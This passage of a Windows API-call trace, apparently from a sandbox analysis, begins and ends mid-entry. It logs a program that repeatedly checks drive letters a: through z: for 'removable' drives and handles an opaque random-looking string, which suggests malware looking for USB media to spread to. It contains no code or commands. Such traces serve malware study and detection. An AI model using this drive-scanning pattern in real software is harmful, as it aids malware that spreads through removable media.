GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.449] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.449] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.449] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.450] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.450] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.450] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.450] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.450] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.451] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.451] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0206.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0206.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0206.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0206.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0206.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0206.452] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0206.452] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.452] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0206.452] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0206.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.452] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0206.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.453] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0206.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0206.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0206.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0206.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0206.453] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.453] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.453] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.454] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.454] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.454] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.454] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.454] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.455] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.455] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.455] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.455] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.455] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.455] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.456] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.456] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.456] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.456] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.456] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.456] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.457] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.457] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.457] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.457] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.457] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.457] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.457] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0206.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0206.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0206.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0206.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0206.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.458] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0206.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0206.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0206.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0206.459] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0206.459] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.459] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.459] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.459] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.460] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0206.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0206.460] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.460] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.460] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.461] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.461] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.461] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.461] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.461] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.461] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.461] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.462] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.462] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.462] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.462] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.462] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.462] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.462] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.463] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.463] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.463] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.463] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.463] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.464] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.464] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.464] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.464] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.464] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.464] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0206.464] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0206.465] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0206.465] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.465] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.465] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.465] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.465] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.465] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.465] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0206.465] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.465] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0206.465] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0206.465] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.465] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.466] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0206.466] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.466] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0206.466] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.466] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.544] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.545] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.545] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.545] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.545] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.545] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.545] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0206.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0206.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.546] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.546] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.546] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.546] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.546] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.547] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.547] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.547] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.547] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.547] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.547] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.548] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.548] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.548] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.548] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.549] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.549] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.549] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.549] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.549] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.550] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.550] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.550] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.550] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.550] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.551] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.551] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.551] HeapFree (in: 